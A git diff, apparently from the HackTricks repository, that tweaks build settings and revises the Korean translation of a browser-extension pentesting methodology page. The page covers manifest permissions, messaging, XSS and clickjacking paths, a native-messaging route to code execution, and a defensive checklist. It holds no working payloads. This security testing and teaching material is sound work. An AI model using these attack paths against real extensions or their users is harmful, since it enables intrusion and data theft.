diff --git a/.github/pull_request_template.md b/.github/pull_request_template.md
index 0d0033b01..6c3408d0d 100644
--- a/.github/pull_request_template.md
+++ b/.github/pull_request_template.md
@@ -1,4 +1,4 @@
 ## Attribution
-귀하의 지식을 소중히 여기며 콘텐츠 공유를 권장합니다. 귀하가 소유하거나 원저자로부터 공유할 수 있는 권한이 있는 콘텐츠만 업로드하도록 하십시오(추가된 텍스트나 수정 중인 페이지의 끝에 저자에 대한 참조를 추가). 지적 재산권에 대한 귀하의 존중은 모두를 위한 신뢰할 수 있고 합법적인 공유 환경을 조성합니다.
+귀하의 지식을 소중히 여기며 콘텐츠 공유를 권장합니다. 귀하가 소유한 콘텐츠 또는 원저자로부터 공유 허가를 받은 콘텐츠만 업로드하도록 하십시오(추가된 텍스트나 수정 중인 페이지의 끝에 저자에 대한 참조를 추가하거나 둘 다). 지적 재산권에 대한 귀하의 존중은 모든 사람을 위한 신뢰할 수 있고 합법적인 공유 환경을 조성합니다.
 
 HackTricks에 기여해 주셔서 감사합니다!
diff --git a/book.toml b/book.toml
index 55f8eeb4f..3d588387c 100644
--- a/book.toml
+++ b/book.toml
@@ -22,6 +22,7 @@ after = ["links"]
 
 [preprocessor.hacktricks]
 command = "python3 ./hacktricks-preprocessor.py"
+env = "prod"
 
 [output.html]
 additional-css = ["theme/pagetoc.css", "theme/tabs.css"]
diff --git a/hacktricks-preprocessor.py b/hacktricks-preprocessor.py
index 37f549101..fedfdef99 100644
--- a/hacktricks-preprocessor.py
+++ b/hacktricks-preprocessor.py
@@ -30,14 +30,16 @@ def ref(matchobj):
     href =  matchobj.groups(0)[0].strip()
     title = href
     if href.startswith("http://") or href.startswith("https://"):
-        # pass
-        try:
-            raw_html = str(urlopen(Request(href, headers={'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0'})).read())
-            match = re.search('<title>(.*?)</title>', raw_html)
-            title = match.group(1) if match else href
-        except Exception as e:
-            logger.debug(f'Error opening URL {href}: {e}')
-            pass #nDont stop on broken link
+        if context['config']['preprocessor']['hacktricks']['env'] == 'dev':
+            pass
+        else:
+            try:
+                raw_html = str(urlopen(Request(href, headers={'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0'})).read())
+                match = re.search('<title>(.*?)</title>', raw_html)
+                title = match.group(1) if match else href
+            except Exception as e:
+                logger.debug(f'Error opening URL {href}: {e}')
+                pass #nDont stop on broken link
     else:
         try:
             if href.endswith("/"):
@@ -90,7 +92,7 @@ if __name__ == '__main__':
     context, book = json.load(sys.stdin)
 
     logger.debug(f"Context: {context}")
-
+    logger.debug(f"Env: {context['config']['preprocessor']['hacktricks']['env']}")
 
     for chapter in iterate_chapters(book['sections']):
         logger.debug(f"Chapter: {chapter['path']}")
diff --git a/src/1911-pentesting-fox.md b/src/1911-pentesting-fox.md
index ee9be9ed5..3c7f407c2 100644
--- a/src/1911-pentesting-fox.md
+++ b/src/1911-pentesting-fox.md
@@ -12,7 +12,7 @@ dht udp "DHT Nodes"
 
 ![](<images/image (273).png>)
 
-![](<images/image (345) (2) (2) (2) (2) (2) (2) (2) (2) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (3).png>)
+![](<images/image (345) (2) (2) (2) (2) (2) (2) (2) (2) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (3).png>)
 
 InfluxDB
 
diff --git a/src/pentesting-web/browser-extension-pentesting-methodology/README.md b/src/pentesting-web/browser-extension-pentesting-methodology/README.md
index bc7cd2a3c..0589f40ef 100644
--- a/src/pentesting-web/browser-extension-pentesting-methodology/README.md
+++ b/src/pentesting-web/browser-extension-pentesting-methodology/README.md
@@ -27,11 +27,11 @@
 ### 경계
 
 > [!CAUTION]
-> 사용자의 전체 권한을 얻으려면 공격자는 확장에 콘텐츠 스크립트에서 확장 코어로, 그리고 확장 코어에서 네이티브 바이너리로 악의적인 입력을 전달하도록 설득해야 합니다.
+> 사용자의 전체 권한을 얻으려면 공격자는 확장에게 콘텐츠 스크립트에서 확장 코어로, 그리고 확장 코어에서 네이티브 바이너리로 악의적인 입력을 전달하도록 설득해야 합니다.
 
 확장의 각 구성 요소는 **강력한 보호 경계**로 서로 분리되어 있습니다. 각 구성 요소는 **별도의 운영 체제 프로세스**에서 실행됩니다. 콘텐츠 스크립트와 확장 코어는 대부분의 운영 체제 서비스에서 사용할 수 없는 **샌드박스 프로세스**에서 실행됩니다.
 
-또한, 콘텐츠 스크립트는 **별도의 JavaScript 힙**에서 실행되어 관련 웹 페이지와 분리됩니다. 콘텐츠 스크립트와 웹 페이지는 **같은 기본 DOM에 접근할 수** 있지만, 두 개는 **JavaScript 포인터를 교환하지 않**아 JavaScript 기능의 유출을 방지합니다.
+게다가, 콘텐츠 스크립트는 **별도의 JavaScript 힙**에서 실행되어 관련 웹 페이지와 분리됩니다. 콘텐츠 스크립트와 웹 페이지는 **같은 기본 DOM에 접근할 수** 있지만, 두 개는 **JavaScript 포인터를 교환하지 않**아 JavaScript 기능의 유출을 방지합니다.
 
 ## **`manifest.json`**
 
@@ -76,7 +76,7 @@ Content scripts는 사용자가 **일치하는 페이지로 이동할 때마다*
 }
 ],
 ```
-더 많은 URL을 포함하거나 제외하려면 **`include_globs`** 및 **`exclude_globs`**를 사용할 수도 있습니다.
+더 많은 URL을 포함하거나 제외하려면 **`include_globs`** 및 **`exclude_globs`**를 사용할 수 있습니다.
 
 이것은 페이지에 설명 버튼을 추가하는 예제 콘텐츠 스크립트로, [저장소 API](https://developer.mozilla.org/en-US/docs/Mozilla/Add-ons/WebExtensions/API/storage)를 사용하여 확장 프로그램의 저장소에서 `message` 값을 검색합니다.
 ```js
@@ -91,11 +91,11 @@ document.body.appendChild(div)
 ```
 <figure><img src="../../images/image (23).png" alt=""><figcaption></figcaption></figure>
 
-이 버튼이 클릭되면 콘텐츠 스크립트를 통해 확장 페이지로 메시지가 전송됩니다. 이는 [**runtime.sendMessage() API**](https://developer.mozilla.org/en-US/docs/Mozilla/Add-ons/WebExtensions/API/runtime/sendMessage)를 활용한 것입니다. 콘텐츠 스크립트는 API에 직접 접근하는 데 제한이 있으며, `storage`가 몇 가지 예외 중 하나입니다. 이러한 예외를 넘어서는 기능을 위해 메시지가 확장 페이지로 전송되며, 콘텐츠 스크립트는 이와 통신할 수 있습니다.
+이 버튼이 클릭되면 콘텐츠 스크립트를 통해 확장 페이지로 메시지가 전송됩니다. 이는 콘텐츠 스크립트가 API에 직접 접근하는 데 제한이 있기 때문이며, `storage`가 몇 가지 예외 중 하나입니다. 이러한 예외를 넘어서는 기능을 위해 메시지가 확장 페이지로 전송되며, 콘텐츠 스크립트는 이와 통신할 수 있습니다.
 
 > [!WARNING]
 > 브라우저에 따라 콘텐츠 스크립트의 기능이 약간 다를 수 있습니다. Chromium 기반 브라우저의 경우 기능 목록은 [Chrome Developers documentation](https://developer.chrome.com/docs/extensions/mv3/content_scripts/#capabilities)에서 확인할 수 있으며, Firefox의 경우 [MDN](https://developer.mozilla.org/en-US/docs/Mozilla/Add-ons/WebExtensions/Content_scripts#webextension_apis)이 주요 출처입니다.\
-> 또한 콘텐츠 스크립트는 백그라운드 스크립트와 통신할 수 있는 능력이 있어, 작업을 수행하고 응답을 전달할 수 있다는 점도 주목할 만합니다.
+> 또한 콘텐츠 스크립트는 백그라운드 스크립트와 통신할 수 있는 능력이 있어, 작업을 수행하고 응답을 전달할 수 있습니다.
 
 Chrome에서 콘텐츠 스크립트를 보기 및 디버깅하려면 Chrome 개발자 도구 메뉴에 접근할 수 있습니다: 옵션 > 추가 도구 > 개발자 도구 또는 Ctrl + Shift + I를 눌러서 접근할 수 있습니다.
 
@@ -217,7 +217,7 @@ js: ["contentScript.js"],
 - **자동 생성:** 명시적으로 정의되지 않은 경우, 브라우저는 자동으로 background page를 생성합니다. 이 자동 생성된 페이지는 확장 매니페스트에 지정된 모든 background 스크립트를 포함하여 확장의 백그라운드 작업이 원활하게 작동하도록 보장합니다.
 
 > [!TIP]
-> 명시적으로 선언되지 않은 경우 브라우저가 background page를 자동으로 생성하는 편리함은 모든 필요한 background 스크립트가 통합되고 작동하도록 보장하여 확장의 설정 프로세스를 간소화합니다.
+> 명시적으로 선언되지 않았을 때 브라우저가 background page를 자동으로 생성하는 편리함은 모든 필요한 background 스크립트가 통합되고 작동하도록 보장하여 확장의 설정 프로세스를 간소화합니다.
 
 Example background script:
 ```js
@@ -246,7 +246,7 @@ chrome.tabs.create({ url: "https://example.net/explanation" })
 이 페이지는 필요에 따라 동적으로 콘텐츠를 로드하므로 백그라운드 페이지처럼 지속적이지 않다는 점에 유의하십시오. 그럼에도 불구하고 이들은 백그라운드 페이지와 특정 기능을 공유합니다:
 
 - **콘텐츠 스크립트와의 통신:** 백그라운드 페이지와 유사하게, 이 페이지는 콘텐츠 스크립트로부터 메시지를 수신할 수 있어 확장 내 상호작용을 촉진합니다.
-- **확장 전용 API에 대한 접근:** 이 페이지는 확장에 대해 정의된 권한에 따라 확장 전용 API에 대한 포괄적인 접근을 누립니다.
+- **확장 전용 API 접근:** 이 페이지는 확장에 대해 정의된 권한에 따라 확장 전용 API에 대한 포괄적인 접근을 누립니다.
 
 ### `permissions` & `host_permissions`
 
@@ -254,7 +254,7 @@ chrome.tabs.create({ url: "https://example.net/explanation" })
 
 브라우저 확장이 매우 **특권적**일 수 있으므로, 악의적인 확장이나 손상된 확장은 공격자가 **민감한 정보를 훔치고 사용자에 대해 스파이할 수 있는 다양한 수단을 허용할 수 있습니다**.
 
-이 설정이 어떻게 작동하는지 및 어떻게 남용될 수 있는지 확인하십시오:
+이 설정이 어떻게 작동하는지 및 어떻게 악용될 수 있는지 확인하십시오:
 
 {{#ref}}
 browext-permissions-and-host_permissions.md
@@ -262,7 +262,7 @@ browext-permissions-and-host_permissions.md
 
 ### `content_security_policy`
 
-**콘텐츠 보안 정책**은 `manifest.json` 내에서도 선언할 수 있습니다. 정의된 것이 있다면, 이는 **취약할 수 있습니다**.
+**콘텐츠 보안 정책**은 `manifest.json` 내에서도 선언할 수 있습니다. 정의된 것이 있다면, **취약할 수 있습니다**.
 
 브라우저 확장 페이지의 기본 설정은 다소 제한적입니다:
 ```bash
@@ -314,16 +314,16 @@ browext-clickjacking.md
 {{#endref}}
 
 > [!TIP]
-> 이러한 페이지가 확장 프로그램에 의해서만 로드되고 무작위 URL에 의해 로드되지 않도록 허용하면 ClickJacking 공격을 방지할 수 있습니다.
+> 이러한 페이지가 확장 프로그램에 의해서만 로드되고 무작위 URL에 의해 로드되지 않도록 하면 ClickJacking 공격을 방지할 수 있습니다.
 
 > [!CAUTION]
 > **`web_accessible_resources`**의 페이지와 확장 프로그램의 다른 페이지도 **백그라운드 스크립트와 연락할 수 있습니다**. 따라서 이러한 페이지 중 하나가 **XSS**에 취약하다면 더 큰 취약점을 열 수 있습니다.
 >
-> 또한, **`web_accessible_resources`**에 표시된 페이지는 iframe 내에서만 열 수 있지만, 새 탭에서 확장 프로그램 ID를 알고 있으면 확장 프로그램의 모든 페이지에 접근할 수 있습니다. 따라서 동일한 매개변수를 악용하는 XSS가 발견되면, 페이지가 **`web_accessible_resources`**에 구성되어 있지 않더라도 악용될 수 있습니다.
+> 또한, **`web_accessible_resources`**에 표시된 페이지는 iframe 내에서만 열 수 있지만, 새 탭에서 확장 ID를 알고 있으면 확장 프로그램의 모든 페이지에 접근할 수 있습니다. 따라서 동일한 매개변수를 악용하는 XSS가 발견되면, 페이지가 **`web_accessible_resources`**에 구성되어 있지 않더라도 악용될 수 있습니다.
 
 ### `externally_connectable`
 
-[**docs**](https://developer.chrome.com/docs/extensions/reference/manifest/externally-connectable)에 따르면, `"externally_connectable"` 매니페스트 속성은 **어떤 확장 프로그램과 웹 페이지가** [runtime.connect](https://developer.chrome.com/docs/extensions/reference/runtime#method-connect) 및 [runtime.sendMessage](https://developer.chrome.com/docs/extensions/reference/runtime#method-sendMessage)를 통해 귀하의 확장 프로그램에 연결할 수 있는지를 선언합니다.
+[**문서**](https://developer.chrome.com/docs/extensions/reference/manifest/externally-connectable)에 따르면, `"externally_connectable"` 매니페스트 속성은 **어떤 확장 프로그램과 웹 페이지가** [runtime.connect](https://developer.chrome.com/docs/extensions/reference/runtime#method-connect) 및 [runtime.sendMessage](https://developer.chrome.com/docs/extensions/reference/runtime#method-sendMessage)를 통해 귀하의 확장 프로그램에 연결할 수 있는지를 선언합니다.
 
 - **`externally_connectable`** 키가 귀하의 확장 프로그램의 매니페스트에 **선언되지 않았거나** **`"ids": ["*"]`**로 선언된 경우, **모든 확장 프로그램이 연결할 수 있지만 웹 페이지는 연결할 수 없습니다**.
 - **특정 ID가 지정된 경우**, 예를 들어 `"ids": ["aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"]`와 같이, **오직 해당 애플리케이션만** 연결할 수 있습니다.
@@ -335,24 +335,24 @@ browext-clickjacking.md
 ```
 - 비어 있는 것으로 지정된 경우: **`"externally_connectable": {}`**, 어떤 앱이나 웹도 연결할 수 없습니다.
 
-여기에서 **확장 프로그램과 URL**이 적을수록, **공격 표면**이 더 작아집니다.
+여기에서 **확장 프로그램과 URL**이 적을수록 **공격 표면**이 작아집니다.
 
 > [!CAUTION]
-> 만약 **`externally_connectable`**에 **XSS 또는 탈취에 취약한** 웹 페이지가 표시되면, 공격자는 **배경 스크립트에 직접 메시지를 보낼 수** 있어, Content Script와 그 CSP를 완전히 우회할 수 있습니다.
+> 만약 웹 페이지가 **XSS 또는 탈취에 취약**하다고 **`externally_connectable`**에 표시되면, 공격자는 **배경 스크립트에 직접 메시지를 보낼 수** 있어, Content Script와 그 CSP를 완전히 우회할 수 있습니다.
 >
 > 따라서, 이는 **매우 강력한 우회**입니다.
 >
-> 게다가, 클라이언트가 악성 확장 프로그램을 설치하면, 취약한 확장 프로그램과 통신할 수 없더라도, **허용된 웹 페이지에 XSS 데이터를 주입**하거나 **`WebRequest`** 또는 **`DeclarativeNetRequest`** API를 악용하여 특정 도메인에서 요청을 조작하고 **JavaScript 파일**에 대한 페이지 요청을 변경할 수 있습니다. (대상 페이지의 CSP가 이러한 공격을 방지할 수 있습니다). 이 아이디어는 [**이 글**](https://www.darkrelay.com/post/opera-zero-day-rce-vulnerability)에서 나왔습니다.
+> 게다가, 클라이언트가 악성 확장 프로그램을 설치하면, 취약한 확장 프로그램과 통신할 수 없더라도 **허용된 웹 페이지에 XSS 데이터를 주입**하거나 **`WebRequest`** 또는 **`DeclarativeNetRequest`** API를 악용하여 특정 도메인에서 요청을 조작하고 **JavaScript 파일**에 대한 페이지 요청을 변경할 수 있습니다. (대상 페이지의 CSP가 이러한 공격을 방지할 수 있습니다). 이 아이디어는 [**이 글**](https://www.darkrelay.com/post/opera-zero-day-rce-vulnerability)에서 나왔습니다.
 
 ## 통신 요약
 
 ### 확장 프로그램 <--> 웹앱
 
-콘텐츠 스크립트와 웹 페이지 간의 통신을 위해 일반적으로 포스트 메시지가 사용됩니다. 따라서 웹 애플리케이션에서는 일반적으로 **`window.postMessage`** 함수 호출을 찾을 수 있으며, 콘텐츠 스크립트에서는 **`window.addEventListener`**와 같은 리스너를 찾을 수 있습니다. 그러나 확장 프로그램이 **Post Message를 보내 웹 애플리케이션과 통신**할 수도 있으므로 웹은 이를 예상해야 하며, 단순히 웹이 새로운 스크립트를 로드하게 할 수도 있습니다.
+콘텐츠 스크립트와 웹 페이지 간의 통신을 위해 일반적으로 포스트 메시지가 사용됩니다. 따라서 웹 애플리케이션에서는 보통 **`window.postMessage`** 함수 호출을 찾을 수 있으며, 콘텐츠 스크립트에서는 **`window.addEventListener`**와 같은 리스너를 찾을 수 있습니다. 그러나 확장 프로그램이 **Post Message를 보내 웹 애플리케이션과 통신**할 수도 있으므로 웹은 이를 예상해야 하며, 단순히 웹이 새로운 스크립트를 로드하도록 할 수도 있습니다.
 
 ### 확장 프로그램 내부
 
-일반적으로 **`chrome.runtime.sendMessage`** 함수가 확장 프로그램 내에서 메시지를 보내는 데 사용되며(일반적으로 `background` 스크립트에서 처리됨), 이를 수신하고 처리하기 위해 **`chrome.runtime.onMessage.addListener`**를 호출하는 리스너가 선언됩니다.
+일반적으로 **`chrome.runtime.sendMessage`** 함수가 확장 프로그램 내에서 메시지를 보내는 데 사용되며(보통 `background` 스크립트에서 처리됨), 이를 수신하고 처리하기 위해 **`chrome.runtime.onMessage.addListener`**를 호출하는 리스너가 선언됩니다.
 
 단일 메시지를 보내는 대신 지속적인 연결을 위해 **`chrome.runtime.connect()`**를 사용할 수도 있으며, 다음 예제와 같이 **메시지를 보내고** **받는** 데 사용할 수 있습니다:
 
@@ -476,7 +476,7 @@ browext-xss-example.md
 
 이것은 "정확히" 통신 방법은 아니지만, **웹과 콘텐츠 스크립트는 웹 DOM에 접근할 수 있습니다**. 따라서 **콘텐츠 스크립트**가 그로부터 정보를 읽고 **웹 DOM을 신뢰하는 경우**, 웹은 이 데이터를 **수정할 수 있습니다** (웹을 신뢰해서는 안 되거나, 웹이 XSS에 취약하기 때문에) 그리고 **콘텐츠 스크립트를 손상시킬 수 있습니다**.
 
-**브라우저 확장을 손상시키기 위한 DOM 기반 XSS의 예시**를 다음에서 찾을 수 있습니다:
+**브라우저 확장을 손상시키기 위한 DOM 기반 XSS의 예시**도 다음에서 찾을 수 있습니다:
 
 {{#ref}}
 browext-xss-example.md
@@ -486,7 +486,7 @@ browext-xss-example.md
 
 콘텐츠 스크립트는 [**runtime.sendMessage()**](https://developer.chrome.com/docs/extensions/reference/runtime#method-sendMessage) **또는** [**tabs.sendMessage()**](https://developer.chrome.com/docs/extensions/reference/tabs#method-sendMessage) 함수를 사용하여 **일회성 JSON 직렬화 가능** 메시지를 보낼 수 있습니다.
 
-**응답**을 처리하려면 반환된 **Promise**를 사용하십시오. 그러나 이전 호환성을 위해 마지막 인수로 **콜백**을 여전히 전달할 수 있습니다.
+**응답**을 처리하려면 반환된 **Promise**를 사용하십시오. 그러나 하위 호환성을 위해 마지막 인수로 **콜백**을 여전히 전달할 수 있습니다.
 
 **콘텐츠 스크립트**에서 요청을 보내는 모습은 다음과 같습니다:
 ```javascript
@@ -525,11 +525,11 @@ if (request.greeting === "hello") sendResponse({ farewell: "goodbye" })
 
 중요한 고려 사항은 여러 페이지가 `onMessage` 이벤트를 수신하도록 설정된 시나리오에서, **특정 이벤트에 대해 `sendResponse()`를 실행하는 첫 번째 페이지**만이 응답을 효과적으로 전달할 수 있다는 것입니다. 동일한 이벤트에 대한 후속 응답은 고려되지 않습니다.
 
-새로운 확장을 만들 때는 콜백보다 프로미스를 선호해야 합니다. 콜백 사용과 관련하여, `sendResponse()` 함수는 동기 컨텍스트 내에서 직접 실행되거나 이벤트 핸들러가 `true`를 반환하여 비동기 작업을 나타내는 경우에만 유효하다고 간주됩니다. 핸들러 중 어느 것도 `true`를 반환하지 않거나 `sendResponse()` 함수가 메모리에서 제거(가비지 컬렉션)되면, `sendMessage()` 함수와 연결된 콜백이 기본적으로 트리거됩니다.
+새로운 확장을 만들 때는 콜백보다 프로미스를 선호해야 합니다. 콜백 사용과 관련하여, `sendResponse()` 함수는 동기 컨텍스트 내에서 직접 실행되거나 이벤트 핸들러가 `true`를 반환하여 비동기 작업을 나타내는 경우에만 유효하다고 간주됩니다. 만약 어떤 핸들러도 `true`를 반환하지 않거나 `sendResponse()` 함수가 메모리에서 제거(가비지 컬렉션)되면, `sendMessage()` 함수와 관련된 콜백이 기본적으로 트리거됩니다.
 
 ## Native Messaging
 
-브라우저 확장은 **stdin을 통해 시스템의 바이너리와 통신할 수** 있습니다. 애플리케이션은 이를 나타내는 json을 설치해야 합니다.
+브라우저 확장은 **stdin을 통해 시스템의 바이너리와 통신할 수** 있습니다. 애플리케이션은 이를 나타내는 json을 설치해야 합니다:
 ```json
 {
 "name": "com.my_company.my_application",
@@ -544,7 +544,7 @@ if (request.greeting === "hello") sendResponse({ farewell: "goodbye" })
 Chrome/Chromium은 이 json을 일부 Windows 레지스트리와 macOS 및 Linux의 일부 경로에서 검색합니다(자세한 정보는 [**docs**](https://developer.chrome.com/docs/extensions/develop/concepts/native-messaging)에서 확인할 수 있습니다).
 
 > [!TIP]
-> 브라우저 확장은 이 통신을 사용하기 위해 `nativeMessaing` 권한이 선언되어야 합니다.
+> 브라우저 확장은 이 통신을 사용하기 위해 `nativeMessaing` 권한을 선언해야 합니다.
 
 다음은 네이티브 애플리케이션에 메시지를 보내는 일부 백그라운드 스크립트 코드의 모습입니다:
 ```javascript
@@ -563,7 +563,7 @@ console.log("Received " + response)
 3. 백그라운드 스크립트는 `sendNativeMessage`를 사용하여 네이티브 애플리케이션에 메시지를 전달합니다.
 4. 네이티브 애플리케이션은 메시지를 위험하게 처리하여 코드 실행으로 이어집니다.
 
-그리고 그 안에서 **브라우저 확장을 악용하여 어떤 페이지에서든 RCE로 가는 방법에 대한 예제가 설명됩니다**.
+그리고 그 안에서 **브라우저 확장을 악용하여 어떤 페이지에서든 RCE로 가는 예제가 설명됩니다**.
 
 ## 메모리/코드/클립보드의 민감한 정보
 
@@ -571,15 +571,15 @@ console.log("Received " + response)
 
 따라서 브라우저 확장 프로그램의 메모리는 **안전하다고 간주되어서는 안 되며**, 자격 증명이나 니모닉 구문과 같은 **민감한 정보는 저장되어서는 안 됩니다**.
 
-물론, **코드에 민감한 정보를 넣지 마십시오**, 왜냐하면 그것은 **공개**될 것이기 때문입니다.
+물론, **코드에 민감한 정보를 넣지 마십시오**, 왜냐하면 이는 **공개**될 것이기 때문입니다.
 
 브라우저에서 메모리를 덤프하려면 **프로세스 메모리를 덤프**하거나 브라우저 확장의 **설정**으로 가서 **`Inspect pop-up`**을 클릭한 후 **`Memory`** 섹션에서 **`Take a snapshot`**을 클릭하고 **`CTRL+F`**를 사용하여 스냅샷 내에서 민감한 정보를 검색할 수 있습니다.
 
-게다가, 니모닉 키나 비밀번호와 같은 매우 민감한 정보는 **클립보드에 복사되는 것을 허용해서는 안 됩니다**(또는 최소한 몇 초 후에 클립보드에서 제거해야 합니다) 왜냐하면 그러면 클립보드를 모니터링하는 프로세스가 이를 얻을 수 있기 때문입니다.
+또한, 니모닉 키나 비밀번호와 같은 매우 민감한 정보는 **클립보드에 복사되는 것을 허용해서는 안 됩니다**(또는 최소한 몇 초 후에 클립보드에서 제거해야 합니다) 왜냐하면 그러면 클립보드를 모니터링하는 프로세스가 이를 얻을 수 있기 때문입니다.
 
 ## 브라우저에 확장 프로그램 로드하기
 
-1. **브라우저 확장 프로그램을 다운로드**하고 압축을 풉니다.
+1. 브라우저 확장 프로그램을 **다운로드**하고 압축을 풉니다.
 2. **`chrome://extensions/`**로 가서 `개발자 모드`를 **활성화**합니다.
 3. **`Load unpacked`** 버튼을 클릭합니다.
 
@@ -587,7 +587,7 @@ console.log("Received " + response)
 
 ## 스토어에서 소스 코드 가져오기
 
-Chrome 확장의 소스 코드는 다양한 방법을 통해 얻을 수 있습니다. 아래는 각 옵션에 대한 자세한 설명과 지침입니다.
+Chrome 확장의 소스 코드는 다양한 방법으로 얻을 수 있습니다. 아래는 각 옵션에 대한 자세한 설명과 지침입니다.
 
 ### 명령줄을 통해 ZIP으로 확장 프로그램 다운로드
 
@@ -621,7 +621,7 @@ unzip -d "$extension_id-source" "$extension_id.zip"
 - `about:extensions` 페이지에서 개발자 모드를 활성화하여 각 확장 프로그램의 ID를 확인합니다.
 - 각 확장 프로그램의 폴더 내에서 `manifest.json` 파일에는 읽기 가능한 `name` 필드가 포함되어 있어 확장 프로그램을 식별하는 데 도움이 됩니다.
 
-### 파일 압축 해제기 또는 언패커 사용
+### 파일 압축 해제기 또는 언팩커 사용
 
 Chrome 웹 스토어에 가서 확장 프로그램을 다운로드합니다. 파일은 `.crx` 확장자를 가집니다. 파일 확장자를 `.crx`에서 `.zip`으로 변경합니다. WinRAR, 7-Zip 등과 같은 파일 압축 해제기를 사용하여 ZIP 파일의 내용을 추출합니다.
 
@@ -644,17 +644,17 @@ node query.js -f "metadata.user_count > 250000" "manifest.content_scripts?.lengt
 - [ ] **`host_permissions`**를 가능한 한 많이 **제한**합니다.
 - [ ] **강력한** **`content_security_policy`**를 사용합니다.
 - [ ] 필요하지 않다면 **`externally_connectable`**를 가능한 한 많이 **제한**하고, 기본값으로 두지 말고 **`{}`**로 지정합니다.
-- [ ] 여기에서 **XSS 또는 인수**에 취약한 **URL**이 언급되면, 공격자는 **백그라운드 스크립트에 직접 메시지를 보낼 수 있습니다**. 매우 강력한 우회입니다.
+- [ ] 여기에서 **XSS 또는 인수 취약한 URL**이 언급되면, 공격자는 **백그라운드 스크립트에 직접 메시지를 보낼 수 있습니다**. 매우 강력한 우회입니다.
 - [ ] **`web_accessible_resources`**를 가능한 한 많이 **제한**합니다. 가능하다면 비워두세요.
 - [ ] **`web_accessible_resources`**가 없지 않다면, [**ClickJacking**](browext-clickjacking.md)을 확인합니다.
-- [ ] **확장 프로그램**에서 **웹 페이지**로 **통신**이 발생하면, **통신에서 발생한 XSS** [**취약점**](browext-xss-example.md)을 **확인합니다**.
+- [ ] **확장 프로그램**에서 **웹 페이지**로 **통신**이 발생하면, **통신에서 발생한 XSS** [**취약점**](browext-xss-example.md)을 확인합니다.
 - [ ] Post Messages가 사용된다면, [**Post Message 취약점**](../postmessage-vulnerabilities/)**을 확인합니다.**
 - [ ] **Content Script가 DOM 세부정보에 접근**하는 경우, 웹에 의해 **수정**될 때 **XSS를 도입하지 않는지** 확인합니다.
-- [ ] 이 통신이 **Content Script -> Background script communication**에 관련되어 있다면 특별히 강조합니다.
-- [ ] 백그라운드 스크립트가 **native messaging**을 통해 통신하는 경우, 통신이 안전하고 정제되었는지 확인합니다.
+- [ ] 이 통신이 **Content Script -> Background script 통신**에 관련되어 있다면 특별히 강조합니다.
+- [ ] 백그라운드 스크립트가 **네이티브 메시징**을 통해 통신하는 경우, 통신이 안전하고 정제되었는지 확인합니다.
 - [ ] **민감한 정보는** 브라우저 확장 프로그램 **코드** 내에 저장되어서는 안 됩니다.
 - [ ] **민감한 정보는** 브라우저 확장 프로그램 **메모리** 내에 저장되어서는 안 됩니다.
-- [ ] **민감한 정보는** **파일 시스템에 보호되지 않은 상태로 저장되어서는 안 됩니다.**
+- [ ] **민감한 정보는** **파일 시스템에 보호되지 않고 저장되어서는 안 됩니다.**
 
 ## 브라우저 확장 프로그램 위험
 
@@ -666,30 +666,30 @@ node query.js -f "metadata.user_count > 250000" "manifest.content_scripts?.lengt
 
 - 제공된 Chrome 웹스토어 링크에서 Chrome 확장을 가져옵니다.
 - [**manifest.json**](https://developer.chrome.com/extensions/manifest) **뷰어**: 확장의 매니페스트의 JSON 예쁘게 정리된 버전을 간단히 표시합니다.
-- **지문 분석**: [web_accessible_resources](https://developer.chrome.com/extensions/manifest/web_accessible_resources)의 감지 및 Chrome 확장 지문 생성 JavaScript의 자동 생성.
-- **잠재적 Clickjacking 분석**: [web_accessible_resources](https://developer.chrome.com/extensions/manifest/web_accessible_resources) 지시어가 설정된 확장 HTML 페이지의 감지. 이러한 페이지의 목적에 따라 Clickjacking에 취약할 수 있습니다.
+- **지문 분석**: [web_accessible_resources](https://developer.chrome.com/extensions/manifest/web_accessible_resources) 감지 및 Chrome 확장 지문 생성 JavaScript 자동 생성.
+- **잠재적 Clickjacking 분석**: [web_accessible_resources](https://developer.chrome.com/extensions/manifest/web_accessible_resources) 지시어가 설정된 확장 HTML 페이지 감지. 이러한 페이지의 목적에 따라 Clickjacking에 취약할 수 있습니다.
 - **권한 경고 뷰어**: 사용자가 확장을 설치하려고 할 때 표시될 모든 Chrome 권한 프롬프트 경고 목록을 보여줍니다.
-- **위험한 함수**: 공격자가 잠재적으로 악용할 수 있는 위험한 함수의 위치를 보여줍니다(예: innerHTML, chrome.tabs.executeScript와 같은 함수).
+- **위험한 함수**: 공격자가 잠재적으로 악용할 수 있는 위험한 함수의 위치를 보여줍니다 (예: innerHTML, chrome.tabs.executeScript와 같은 함수).
 - **진입점**: 확장이 사용자/외부 입력을 받는 위치를 보여줍니다. 이는 확장의 표면적을 이해하고 악의적으로 조작된 데이터를 확장으로 보낼 수 있는 잠재적 지점을 찾는 데 유용합니다.
 - 위험한 함수 및 진입점 스캐너는 생성된 경고에 대해 다음을 포함합니다:
-- 경고를 유발한 관련 코드 스니펫 및 줄.
-- 문제에 대한 설명.
-- 코드를 포함하는 전체 소스 파일을 보기 위한 “파일 보기” 버튼.
-- 경고된 파일의 경로.
-- 경고된 파일의 전체 Chrome 확장 URI.
-- 파일의 유형(예: Background Page 스크립트, Content Script, Browser Action 등).
-- 취약한 줄이 JavaScript 파일에 있는 경우, 포함된 모든 페이지의 경로와 이 페이지의 유형 및 [web_accessible_resource](https://developer.chrome.com/extensions/manifest/web_accessible_resources) 상태.
-- **Content Security Policy (CSP) 분석기 및 우회 검사기**: 확장의 CSP의 약점을 지적하고 화이트리스트된 CDN 등으로 인해 CSP를 우회할 수 있는 잠재적인 방법을 밝혀냅니다.
+  - 경고를 유발한 관련 코드 스니펫 및 줄.
+  - 문제 설명.
+  - 코드를 포함하는 전체 소스 파일을 보기 위한 "파일 보기" 버튼.
+  - 경고된 파일의 경로.
